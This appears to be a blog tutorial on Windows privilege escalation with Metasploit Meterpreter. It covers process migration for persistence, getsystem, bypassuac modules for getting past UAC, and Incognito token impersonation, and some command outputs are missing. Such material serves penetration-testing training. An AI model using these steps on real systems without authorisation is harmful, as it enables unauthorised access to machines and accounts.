Windows Privilege Escalation

What is Privilege Escalation?

Privilege escalation is an attack that exploits operating system or third-party software vulnerabilities (bugs, design flaws, etc.) in order to elevate the current access (privileges) to protected resources. In other words, the attacker is able to gain unauthorized access to resources that he/she is not supposed to access.

They can be divided into two types:

  • Vertical: the attacker is able to move from a lower privileged user to a higher privileged user. For example from a low-end user to administrator or root user.

  • Horizontal: the attacker keeps the same set or level of privileges, but assumes the identity of a different user (he/she does not gain any further privilege).

For Example:

  • Vertical privilege escalation: on a Linux OS, the attacker is able to escalate privileges from a user (i.e. applications) and gain root privileges.

  • Horizontal: on a Windows OS, the attacker is able to assume the identity on any other Standard user. The attacker is not escalating privileges from a Standard user to an Administrator user.

We can gather more information with

meterpreter > sysinfo

Once we have exploited the machine Meterpreter has some very useful scripts we can run:


Don't underestimate the Information gathering phase we want to know what we a dealing with. Then we can start thinking about maintaining access. In this phase we want to make sure that our session is:

  • Stable
  • Privileged (can be run with high privileges)
  • Persistent (survives reboots)

To avoid having our session killed by the user or program we want to migrate the session to another process running on the system.

We can run:


This will try to automatically migrate the running process. NOTE that the process on which it will migrate will always be a process with the same privileges as the current session.

If we want to manually migrate the process we can manually list the running process by using the ps command:


We can now manually run:

meterpreter > migrate <PID you choose>

Once we have migrated our session, we can start our Post-Exploitation process.

We want persistence so we can get back in at anytime. However we also need the shell to run with the highest privileges possible.

The easiest and fastest way to get higher privileges is by running

meterpreter > getsystem

It will automatically find the best technique to elevate privileges.

By default, the getsystem command tries all available techniques to escalate the privileges. If a technique fails, it will try the next one until one of the available techniques works. If you want to run a specific technique, simply use the –t option as follow:

meterpreter > getsystem -t 1

Notice that depending on the current privileges on the machine, the getsystem command might fail. For example, if you use this technique on systems with User Account Control (UAC) enabled (Windows Vista+), it would not work as well as systems like Windows XP. We need to use other techniques to get past this protection and then be able to successfully obtain system privileges.

Moreover, you should be aware that getsystem works only against Windows operating systems. For different operating systems, you will have to rely on different Metasploit modules.If you want to know which modules Metasploit offers, you can navigate the exploit/[OS]/localpath.

Bypassing UAC

What is UAC?

User Account Control or UAC for short is a security feature of Windows which helps prevent unauthorized changes to the operating system. These changes can be initiated by applications, users, viruses or other forms of malware. User Account Control makes sure certain changes are made only with approval from the administrator. If the changes are not approved by the administrator, they are not executed, and Windows remains unchanged. It is as if nothing happened. UAC was first made available for Windows Vista, and since then it was improved with each new version of Windows.

For obvious reasons this is not good.

When UAC is enabled on the remote system, bypassuac is one of the modules we can use to bypass it. We can verify if UAC is enabled by running the module post/windows/gather/win_privs. If in the result the UAC Enabled column is set to true, it means that the remote system has the UAC enabled.


Let us list some modules that we can use in Metasploit that may help us bypass the UAC protection. We can list them by searching the string bypassuac


The steps we will have to do are very easy:

  1. Select the bypassuac_vbs module, since it is the newest module available

  2. Set the meterpreter session ID on which the module will be executed

  3. Run the module...If the module completes, we will get a new meterpreter session with highest privileges. Remember that this is a bypass, so UAC will still be enabled on the target.

If the exploit succeeds, we will obtain a new meterpreter session that has higher privileges on the machine. We can confirm this by running:

meterpreter > run post/windows/gather/win_privs


We now have admin privileges on the machine. But not the highest (Is System is false) Let us run getsystem once again this time it should work.

meterpreter > getsystem

Let us check again.



As you can see there are many ways we are able to escalate privileges and we are only scratching the surface in regards to what is possible.

Lets go "Incognito"

There is another tool a powerful extension called "Incognito" Thanks to Incognito, we can impersonate other valid user tokens on that machine and become that user. The best thing is that we do not even need to know or crack passwords to do this.

As you can imagine, being able to switch from one user to another gives us the possibility to access different local or domain resources.

Loading incognito is very simple. Once we have a meterpreter session (better with system privileges), we can run the following command to load the incognito extension:

meterpreter > use incognito

List available commands with:

meterpreter > list_token

Impersonate another user with:


This concludes a basic run down on Windows privilege escalation. There are many more ways to do Privesc, also not to mention things like Unquoted service Paths.

Comments (1)

Jin's photo

Great write-up!